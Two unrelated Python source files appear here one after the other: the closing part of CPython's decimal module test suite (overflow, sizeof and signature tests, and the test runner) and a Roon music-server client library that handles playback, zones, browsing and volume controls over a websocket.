self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if orig_sys_decimal is not sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
roonapi.py
|
from __future__ import unicode_literals
import os
import threading
import time
from .constants import (
LOGGER,
PAGE_SIZE,
SERVICE_BROWSE,
SERVICE_REGISTRY,
SERVICE_TRANSPORT,
CONTROL_VOLUME,
)
from .discovery import RoonDiscovery
from .roonapisocket import RoonApiWebSocket
def split_media_path(path):
"""Split a path (eg path/to/media) into a list for use by play_media."""
allparts = []
while 1:
parts = os.path.split(path)
if parts[0] == path: # sentinel for absolute paths
allparts.insert(0, parts[0])
break
if parts[1] == path: # sentinel for relative paths
allparts.insert(0, parts[1])
break
path = parts[0]
allparts.insert(0, parts[1])
return allparts
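# Illustrative example (hypothetical path, not from the original module docs):
# split_media_path("Library/Artists/Neil Young/Harvest") returns
# ["Library", "Artists", "Neil Young", "Harvest"], which is the list form
# expected by RoonApi.play_media below.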
class RoonApi: # pylint: disable=too-many-instance-attributes
"""Class to handle talking to the roon server."""
_roonsocket = None
_roondiscovery = None
_host = None
_core_id = None
_core_name = None
_port = None
_token = None
_exit = False
_zones = {}
_outputs = {}
_state_callbacks = []
ready = False
_volume_controls_request_id = None
_volume_controls = {}
@property
def token(self):
"""Return the authentication key from the registration with Roon."""
return self._token
@property
def host(self):
"""Return the roon host."""
return self._host
@property
def core_id(self):
"""Return the roon host."""
return self._core_id
@property
def core_name(self):
"""Return the roon core name."""
return self._core_name
@property
def zones(self):
"""Return All zones as a dict."""
return self._zones
@property
def outputs(self):
"""All outputs, returned as dict."""
return self._outputs
def zone_by_name(self, zone_name):
"""Get zone details by name."""
for zone in self.zones.values():
if zone["display_name"] == zone_name:
return zone
return None
def output_by_name(self, output_name):
"""Get the output details from the name."""
for output in self.outputs.values():
if output["display_name"] == output_name:
return output
return None
def zone_by_output_id(self, output_id):
"""Get the zone details by output id."""
for zone in self.zones.values():
for output in zone["outputs"]:
if output["output_id"] == output_id:
return zone
return None
def zone_by_output_name(self, output_name):
"""
Get the zone details by an output name.
params:
output_name: the name of the output
returns: full zone details (dict)
"""
for zone in self.zones.values():
for output in zone["outputs"]:
if output["display_name"] == output_name:
return zone
return None
def is_grouped(self, output_id):
"""
Whether this output is part of a group.
params:
output_id: the id of the output
returns: boolean whether this output is grouped
"""
try:
output = self.outputs[output_id]
zone_id = output["zone_id"]
is_grouped = len(self.zones[zone_id]["outputs"]) > 1
except KeyError:
is_grouped = False
return is_grouped
def is_group_main(self, output_id):
"""
Whether this output is the main output of a group.
params:
output_id: the id of the output
returns: boolean whether this output is the main output of a group
"""
if not self.is_grouped(output_id):
return False
output = self.outputs[output_id]
zone_id = output["zone_id"]
is_group_main = self.zones[zone_id]["outputs"][0]["output_id"] == output_id
return is_group_main
def grouped_zone_names(self, output_id):
"""
Get the names of the group players.
params:
output_id: the id of the output
returns: The names of the grouped zones. The first is the main output.
"""
if not self.is_grouped(output_id):
return []
output = self.outputs[output_id]
zone_id = output["zone_id"]
grouped_zone_names = [o["display_name"] for o in self.zones[zone_id]["outputs"]]
return grouped_zone_names
def get_image(self, image_key, scale="fit", width=500, height=500):
"""
Get the image url for the specified image key.
params:
image_key: the key for the image as retrieved in other api calls
scale: optional (value of fit, fill or stretch)
width: the width of the image (required if scale is specified)
height: the height of the image (required if scale is set)
returns: string with the full url to the image
"""
return "http://%s:%s/api/image/%s?scale=%s&width=%s&height=%s" % (
self._host,
self._port,
image_key,
scale,
width,
height,
)
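# Minimal usage sketch (hypothetical host, port and image key, assuming the server
# was discovered at 192.168.1.10:9100): roonapi.get_image("abc123", scale="fit",
# width=300, height=300) would return
# "http://192.168.1.10:9100/api/image/abc123?scale=fit&width=300&height=300".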
def playback_control(self, zone_or_output_id, control="play"):
"""
Send player command to the specified zone.
params:
zone_or_output_id: the id of the zone or output
control:
* "play" - If paused or stopped, start playback
* "pause" - If playing or loading, pause playback
* "playpause" - If paused or stopped, start playback.
If playing or loading, pause playback.
* "stop" - Stop playback and release the audio device immediately
* "previous" - Go to the start of the current track, or to the previous track
* "next" - Advance to the next track
"""
data = {"zone_or_output_id": zone_or_output_id, "control": control}
return self._request(SERVICE_TRANSPORT + "/control", data)
def pause_all(self):
"""Pause all zones."""
return self._request(SERVICE_TRANSPORT + "/pause_all")
def standby(self, output_id, control_key=None):
"""
Send standby command to the specified output.
params:
output_id: the id of the output to put in standby
control_key: The control_key that identifies the source_control
that is to be put into standby. If omitted,
then all source controls on this output that support
standby will be put into standby.
"""
data = {"output_id": output_id, "control_key": control_key}
return self._request(SERVICE_TRANSPORT + "/standby", data)
def convenience_switch(self, output_id, control_key=None):
"""
Switch (convenience) an output, take it out of standby if needed.
params:
output_id: the id of the output that should be convenience-switched.
control_key: The control_key that identifies the source_control that is to be switched.
If omitted, then all controls on this output will be convenience switched.
"""
data = {"output_id": output_id, "control_key": control_key}
return self._request(SERVICE_TRANSPORT + "/convenience_switch", data)
def mute(self, output_id, mute=True):
"""
Mute/unmute an output.
params:
output_id: the id of the output that should be muted/unmuted
mute: bool if the output should be muted. Will unmute if set to False
"""
how = "mute" if mute else "unmute"
data = {"output_id": output_id, "how": how}
return self._request(SERVICE_TRANSPORT + "/mute", data)
def change_volume(self, output_id, value, method="absolute"):
"""
Change the volume of an output.
For convenience you can always just give the new volume level as percentage.
params:
output_id: the id of the output
value: The new volume value, or the increment value or step (as percentage)
method: How to interpret the volume ('absolute'|'relative'|'relative_step')
"""
if "volume" not in self._outputs[output_id]:
LOGGER.info("This endpoint has fixed volume.")
return None
# Home assistant was catching this - so catch here
# to try and diagnose what needs to be checked.
try:
if method == "absolute":
if self._outputs[output_id]["volume"]["type"] == "db":
value = int((float(value) / 100) * 80) - 80
data = {"output_id": output_id, "how": method, "value": value}
return self._request(SERVICE_TRANSPORT + "/change_volume", data)
except Exception as exc: # pylint: disable=broad-except
LOGGER.error("set_volume_level failed for entity %s.", str(exc))
return None
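# Worked example of the db conversion above (assuming the output reports volume in dB
# over an 80 dB range): a percentage value of 100 maps to 0 dB, 50 maps to -40 dB and
# 0 maps to -80 dB, so change_volume(output_id, 50) on a db-type output requests -40 dB.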
def seek(self, zone_or_output_id, seconds, method="absolute"):
"""
Seek to a time position within the now playing media.
params:
zone_or_output_id: the id of the zone or output
seconds: The target seek position
method: How to interpret the target seek position ('absolute'|'relative')
"""
data = {
"zone_or_output_id": zone_or_output_id,
"how": method,
"seconds": seconds,
}
return self._request(SERVICE_TRANSPORT + "/seek", data)
def shuffle(self, zone_or_output_id, shuffle=True):
"""
Enable or disable playing in random order.
params:
zone_or_output_id: the id of the output or zone
shuffle: bool if shuffle should be enabled. False will disable shuffle
"""
data = {"zone_or_output_id": zone_or_output_id, "shuffle": shuffle}
return self._request(SERVICE_TRANSPORT + "/change_settings", data)
def repeat(self, zone_or_output_id, repeat=True):
"""
Enable/disable playing in a loop.
params:
zone_or_output_id: the id of the output or zone
repeat: bool if repeat should be enabled. False will disable repeat
"""
loop = "loop" if repeat else "disabled"
data = {"zone_or_output_id": zone_or_output_id, "loop": loop}
return self._request(SERVICE_TRANSPORT + "/change_settings", data)
def transfer_zone(self, from_zone_or_output_id, to_zone_or_output_id):
"""
Transfer the current queue from one zone to another.
params:
from_zone_or_output_id - The source zone or output
to_zone_or_output_id - The destination zone or output
"""
data = {
"from_zone_or_output_id": from_zone_or_output_id,
"to_zone_or_output_id": to_zone_or_output_id,
}
return self._request(SERVICE_TRANSPORT + "/transfer_zone", data)
def group_outputs(self, output_ids):
"""
Create a group of synchronized audio outputs.
params:
output_ids - The outputs to group. The first output's zone's queue is preserved.
"""
data = {"output_ids": output_ids}
return self._request(SERVICE_TRANSPORT + "/group_outputs", data)
def ungroup_outputs(self, output_ids):
"""
Ungroup previously grouped outputs.
params:
output_ids - The outputs to ungroup.
"""
data = {"output_ids": output_ids}
return self._request(SERVICE_TRANSPORT + "/ungroup_outputs", data)
def register_state_callback(self, callback, event_filter=None, id_filter=None):
"""
Register a callback to be informed about changes to zones or outputs.
params:
callback: method to be called when state changes occur; it will be passed an event param as string and a list of changed objects
callback will be called with params:
- event: string with name of the event ("zones_changed", "zones_seek_changed", "outputs_changed")
- a list with the zone or output id's that changed
event_filter: only callback if the event is in this list
id_filter: one or more zone or output id's or names to filter on (list or string)
"""
if not event_filter:
event_filter = []
elif not isinstance(event_filter, list):
event_filter = [event_filter]
if not id_filter:
id_filter = []
elif not isinstance(id_filter, list):
id_filter = [id_filter]
self._state_callbacks.append((callback, event_filter, id_filter))
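# Registration sketch (hypothetical callback name); the callback receives the event
# name and the list of changed ids, as described in the docstring above:
#   def on_roon_change(event, changed_ids):
#       print(event, changed_ids)
#   roonapi.register_state_callback(on_roon_change, event_filter="zones_changed")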
def register_queue_callback(self, callback, zone_or_output_id=""):
"""
Subscribe to queue change events.
callback: function which will be called with the updated data (provided as a dict object)
zone_or_output_id: If provided, only listen for updates for this zone or output
"""
if zone_or_output_id:
opt_data = {"zone_or_output_id": zone_or_output_id}
else:
opt_data = None
self._roonsocket.subscribe(SERVICE_TRANSPORT, "queue", callback, opt_data)
def browse_browse(self, opts):
"""
Complex browse call on the roon api.
reference: https://github.com/RoonLabs/node-roon-api-browse/blob/master/lib.js
"""
return self._request(SERVICE_BROWSE + "/browse", opts)
def browse_load(self, opts):
"""
Complex browse call on the roon api.
reference: https://github.com/RoonLabs/node-roon-api-browse/blob/master/lib.js
"""
return self._request(SERVICE_BROWSE + "/load", opts)
def play_media(self, zone_or_output_id, path, action=None):
"""
Play the media specified.
params:
zone_or_output_id: where to play the media
path: a list allowing roon to find the media
eg ["Library", "Artists", "Neil Young", "Harvest"] or ["My Live Radio", "BBC Radio 4"]
action: the roon action to take to play the media - leave blank to choose the roon default
eg "Play Now", "Queue" or "Start Radio"
"""
opts = {
"zone_or_output_id": zone_or_output_id,
"hierarchy": "browse",
"count": PAGE_SIZE,
"pop_all": True,
}
total_count = self.browse_browse(opts)["list"]["count"]
del opts["pop_all"]
load_opts = {
"zone_or_output_id": zone_or_output_id,
"hierarchy": "browse",
"count": PAGE_SIZE,
"offset": 0,
}
items = []
for element in path:
load_opts["offset"] = 0
found = None
searched = 0
LOGGER.debug("Looking for %s", element)
while searched < total_count and found is None:
items = self.browse_load(load_opts)["items"]
for item in items:
searched += 1
if item["title"] == element:
found = item
break
load_opts["offset"] += PAGE_SIZE
if searched >= total_count and found is None:
LOGGER.error(
"Could not find media path element '%s' in %s",
element,
[item["title"] for item in items],
)
return None
opts["item_key"] = found["item_key"]
load_opts["item_key"] = found["item_key"]
total_count = self.browse_browse(opts)["list"]["count"]
load_opts["offset"] = 0
items = self.browse_load(load_opts)["items"]
if found["hint"] == "action":
# Loading item we found already started playing
return True
# First item should be the action/action_list for playing this item (eg Play Genre, Play Artist, Play Album)
if items[0].get("hint") not in ["action_list", "action"]:
LOGGER.error(
"Found media does not have playable action_list hint='%s' '%s'",
items[0].get("hint"),
[item["title"] for item in items],
)
return False
play_header = items[0]["title"]
if items[0].get("hint") == "action_list":
opts["item_key"] = items[0]["item_key"]
load_opts["item_key"] = items[0]["item_key"]
self.browse_browse(opts)
items = self.browse_load(load_opts)["items"]
# We should now have play actions (eg Play Now, Add Next, Queue action, Start Radio)
# So pick the one to use - the default is the first one
if action is None:
take_action = items[0]
else:
found_actions = [item for item in items if item["title"] == action]
if len(found_actions) == 0:
LOGGER.error(
"Could not find play action '%s' in %s",
action,
[item["title"] for item in items],
)
return False
take_action = found_actions[0]
if take_action["hint"] != "action":
LOGGER.error(
"Found media does not have playable action %s - %s",
take_action["title"],
take_action["hint"],
)
return False
opts["item_key"] = take_action["item_key"]
load_opts["item_key"] = take_action["item_key"]
LOGGER.info("Play action was '%s' / '%s'", play_header, take_action["title"])
self.browse_browse(opts)
return True
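# Usage sketch (zone_id is a hypothetical variable), mirroring the docstring above:
#   roonapi.play_media(zone_id, ["My Live Radio", "BBC Radio 4"])
#   roonapi.play_media(zone_id, ["Library", "Artists", "Neil Young", "Harvest"], "Queue")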
# pylint: disable=too-many-return-statements
def play_id(self, zone_or_output_id, media_id):
"""Play based on the media_id from the browse api."""
opts = {
"zone_or_output_id": zone_or_output_id,
"item_key": media_id,
"hierarchy": "browse",
}
header_result = self.browse_browse(opts)
# For Radio the above load starts play - so catch this and return
try:
if header_result["list"]["level"] == 0:
LOGGER.info("Initial load started playback")
return True
except (NameError, KeyError, TypeError):
LOGGER.error("Could not play id:%s, result: %s", media_id, header_result)
return False
if header_result is None:
LOGGER.error(
"Playback requested of unsupported id: %s",
media_id,
)
return False
result = self.browse_load(opts)
first_item = result["items"][0]
hint = first_item["hint"]
if not (hint in ["action", "action_list"]):
LOGGER.error(
"Playback requested but item is a list, not a playable action or action_list id: %s",
media_id,
)
return False
if hint == "action_list":
opts["item_key"] = first_item["item_key"]
result = self.browse_browse(opts)
if result is None:
LOGGER.error(
"Playback requested of unsupported id: %s",
media_id,
)
return False
result = self.browse_load(opts)
first_item = result["items"][0]
hint = first_item["hint"]
if hint != "action":
LOGGER.error(
"Playback requested but item does not have a playable action id: %s, %s",
media_id,
header_result,
)
return False
play_action = result["items"][0]
hint = play_action["hint"]
LOGGER.info("'%s' for '%s')", play_action["title"], header_result)
opts["item_key"] = play_action["item_key"]
self.browse_browse(opts)
if result is None:
LOGGER.error(
"Playback requested of unsupported id: %s",
media_id,
)
return False
return True
# private methods
# pylint: disable=too-many-arguments
def __init__(
self,
appinfo,
token=None,
host=None,
port=9100,
blocking_init=True,
core_id=None,
):
"""
Set up the connection with Roon.
appinfo: a dict of the required information about the app that should be connected to the api
token: used for persistent storage of the auth token; will be set on the token attribute once retrieved. You should handle saving of the key yourself
host: optional; the ip or hostname of the Roon server, will be auto discovered if omitted
port: optional; the http port of the Roon websockets api. Should be the default of 9100
blocking_init: By default the init will halt until the socket is connected and the app is authenticated;
if you set this bool to False the init will continue, but you will only receive data once the connection is fully initialized.
The latter is preferred if you're (only) using the callbacks
"""
self._appinfo = appinfo
self._token = token
if not appinfo or not isinstance(appinfo, dict):
raise "appinfo missing or in incorrect format!"
if host and port:
self._server_discovered(host, port)
else:
self._roondiscovery = RoonDiscovery(self._server_discovered, core_id)
self._roondiscovery.start()
# block until we're ready
if blocking_init:
while not self.ready and not self._exit:
time.sleep(1)
# start socket watcher
thread_id = threading.Thread(target=self._socket_watcher)
thread_id.daemon = True
thread_id.start()
# pylint: disable=redefined-builtin
def __exit__(self, type, value, exc_tb):
"""Stop socket and discovery on exit."""
self.stop()
def __enter__(self):
"""Just return self on entry."""
return self
def stop(self):
"""Stop socket and discovery."""
self._exit = True
if self._roondiscovery:
self._roondiscovery.stop()
if self._roonsocket:
self._roonsocket.stop()
def _server_discovered(self, host, port):
"""(Auto) discovered the roon server on the network."""
LOGGER.info("Connecting to Roon server %s:%s" % (host, port))
ws_address = "ws://%s:%s/api" % (host, port)
self._host = host
self._port = port
self._roonsocket = RoonApiWebSocket(ws_address)
self._roonsocket.register_connected_callback(self._socket_connected)
self._roonsocket.register_registered_calback(self._server_registered)
self._roonsocket.register_volume_controls_callback(self._on_volume_control_request)
self._roonsocket.start()
def _socket_connected(self):
"""Successfully connected the websocket."""
LOGGER.info("Connection with roon websockets (re)created.")
self.ready = False
self._volume_controls_request_id = None
# authenticate / register
# warning: at first launch the user has to approve the app in the Roon settings.
appinfo = self._appinfo.copy()
appinfo["required_services"] = [SERVICE_TRANSPORT, SERVICE_BROWSE]
appinfo["provided_services"] = [CONTROL_VOLUME]
if self._token:
appinfo["token"] = self._token
if not self._token:
LOGGER.info("The application should be approved within Roon's settings.")
else:
LOGGER.info("Confirming previous registration with Roon...")
self._roonsocket.send_request(SERVICE_REGISTRY + "/register", appinfo)
def _server_registered(self, reginfo):
LOGGER.info("Registered to Roon server %s", reginfo["display_name"])
LOGGER.debug(reginfo)
self._token = reginfo["token"]
self._core_id = reginfo["core_id"]
self._core_name = reginfo["display_name"]
# fill zones and outputs dicts one time so the data is available right away
if not self._zones:
self._zones = self._get_zones()
if not self._outputs:
self._outputs = self._get_outputs()
# subscribe to state change events
self._roonsocket.subscribe(SERVICE_TRANSPORT, "zones", self._on_state_change)
self._roonsocket.subscribe(SERVICE_TRANSPORT, "outputs", self._on_state_change)
# set flag that we're fully initialized (used for blocking init)
self.ready = True
# pylint: disable=too-many-branches
def _on_state_change(self, msg):
"""Process messages we receive from the roon websocket into a more usable format."""
events = []
if not msg or not isinstance(msg, dict):
return
for state_key, state_values in msg.items():
changed_ids = []
filter_keys = []
if state_key in [
"zones_seek_changed",
"zones_changed",
"zones_added",
"zones",
]:
for zone in state_values:
if zone["zone_id"] in self._zones:
self._zones[zone["zone_id"]].update(zone)
else:
self._zones[zone["zone_id"]] = zone
changed_ids.append(zone["zone_id"])
if "display_name" in zone:
filter_keys.append(zone["display_name"])
if "outputs" in zone:
for output in zone["outputs"]:
filter_keys.append(output["output_id"])
filter_keys.append(output["display_name"])
event = (
"zones_seek_changed"
if state_key == "zones_seek_changed"
else "zones_changed"
)
events.append((event, changed_ids, filter_keys))
elif state_key in ["outputs_changed", "outputs_added", "outputs"]:
for output in state_values:
if output["output_id"] in self._outputs:
self._outputs[output["output_id"]].update(output)
else:
self._outputs[output["output_id"]] = output
changed_ids.append(output["output_id"])
filter_keys.append(output["display_name"])
filter_keys.append(output["zone_id"])
event = "outputs_changed"
events.append((event, changed_ids, filter_keys))
elif state_key == "zones_removed":
for item in state_values:
del self._zones[item]
elif state_key == "outputs_removed":
for item in state_values:
del self._outputs[item]
else:
LOGGER.warning("unknown state change: %s" % msg)
for event, changed_ids, filter_keys in events:
filter_keys.extend(changed_ids)
for item in self._state_callbacks:
callback = item[0]
event_filter = item[1]
id_filter = item[2]
if event_filter and (event not in event_filter):
continue
if id_filter and set(id_filter).isdisjoint(filter_keys):
continue
try:
callback(event, changed_ids)
# pylint: disable=broad-except
except Exception:
LOGGER.exception("Error while executing callback!")
def _get_outputs(self):
outputs = {}
data = self._request(SERVICE_TRANSPORT + "/get_outputs")
if data and "outputs" in data:
for output in data["outputs"]:
outputs[output["output_id"]] = output
return outputs
def _get_zones(self):
zones = {}
data = self._request(SERVICE_TRANSPORT + "/get_zones")
if data and "zones" in data:
for zone in data["zones"]:
zones[zone["zone_id"]] = zone
return zones
def _request(self, command, data=None):
"""Send command and wait for result."""
if not self._roonsocket:
retries = 20
while (not self.ready or not self._roonsocket) and retries:
retries -= 1
time.sleep(0.2)
if not self.ready or not self._roonsocket:
LOGGER.warning("socket is not yet ready")
if not self._roonsocket:
return None
request_id = self._roonsocket.send_request(command, data)
result = None
retries = 50
while retries:
result = self._roonsocket.results.get(request_id)
if result:
break
retries -= 1
time.sleep(0.05)
try:
del self._roonsocket.results[request_id]
except KeyError:
pass
return result
def _socket_watcher(self):
"""Monitor the connection state of the socket and reconnect if needed."""
while not self._exit:
if self._roonsocket and self._roonsocket.failed_state:
LOGGER.warning("Socket connection lost! Will try to reconnect in 20s")
count = 0
while not self._exit and count < 21:
count += 1
time.sleep(1)
if not self._exit:
self._server_discovered(self._host, self._port)
time.sleep(2)
def register_volume_control(self, control_key, display_name, callback, initial_volume=0, volume_type="number", volume_step=2, volume_min=0, volume_max=100, is_muted=False):
"""Register a new volume control on the api."""
if control_key in self._volume_controls:
LOGGER.error("source_control %s is already registered!" % control_key)
return
control_data = {
"display_name": display_name,
"volume_type": volume_type,
"volume_min": volume_min,
"volume_max": volume_max,
"volume_value": initial_volume,
"volume_step": volume_step,
"is_muted": is_muted,
"control_key": control_key
}
self._volume_controls[control_key] = (callback, control_data)
if self._volume_controls_request_id:
data = {"controls_added":[ control_data ]}
self._roonsocket.send_continue(self._volume_controls_request_id, data)
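# Registration sketch (hypothetical names); the callback is invoked by
# _on_volume_control_request below as callback(control_key, event, value):
#   def my_volume_cb(control_key, event, value):
#       pass  # apply "set_volume"/"set_mute" events to the external device
#   roonapi.register_volume_control("my_amp", "My Amplifier", my_volume_cb, initial_volume=30)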
def update_volume_control(self, control_key, volume=None, mute=None):
''' update an existing volume control, report its state to Roon '''
if control_key not in self._volume_controls:
LOGGER.warning("volume_control %s is not (yet) registered!" % control_key)
return
if not self._volume_controls_request_id:
LOGGER.warning("Not yet registered, can not update volume control")
return False
if volume != None:
self._volume_controls[control_key][1]["volume_value"] = volume
if mute != None:
self._volume_controls[control_key][1]["is_muted"] = mute
data = {"controls_changed": [ self._volume_controls[control_key][1] ] }
self._roonsocket.send_continue(self._volume_controls_request_id, data)
def _on_volume_control_request(self, event, request_id, data):
''' got request from roon server for a volume control registered on this endpoint'''
if event == "subscribe_controls":
LOGGER.debug("found subscription ID for volume controls: %s " % request_id)
# send all volume controls already registered (handle connection loss)
controls = []
for callback, control_data in self._volume_controls.values():
controls.append(control_data)
self._roonsocket.send_continue(request_id, { "controls_added":controls })
self._volume_controls_request_id = request_id
elif data and data.get("control_key"):
control_key = data["control_key"]
if event == "set_volume" and data["mode"] == "absolute":
value = data["value"]
elif event == "set_volume" and data["mode"] == "relative":
value = self._volume_controls[control_key][1]["volume_value"] + data["value"]
elif event == "set_volume" and data["mode"] == "relative_step":
value = self._volume_controls[control_key][1]["volume_value"] + (data["value"] * data["volume_step"])
elif event == "set_mute":
value = data["mode"] == "on"
else:
return
try:
self._roonsocket.send_complete(request_id, "Success")
self._volume_controls[control_key][0](control_key, event, value)
except Exception:
LOGGER.exception("Error in volume_control callback")
self._roonsocket.send_complete(request_id, "Error")
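# --- Added illustration (not part of the original module) ---
# A minimal usage sketch of the volume-control API above. `roonapi` stands for an
# already connected instance of this class (its construction is outside this
# excerpt), and the callback signature mirrors how _on_volume_control_request
# invokes it: callback(control_key, event, value).
#
#   def my_volume_callback(control_key, event, value):
#       if event == "set_volume":
#           print("Roon wants volume of %s set to %s" % (control_key, value))
#       elif event == "set_mute":
#           print("Roon wants mute of %s set to %s" % (control_key, value))
#
#   roonapi.register_volume_control(
#       "my_amp", "Living Room Amp", my_volume_callback,
#       initial_volume=30, volume_step=2, volume_min=0, volume_max=100)
#   roonapi.update_volume_control("my_amp", volume=35, mute=False)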
|
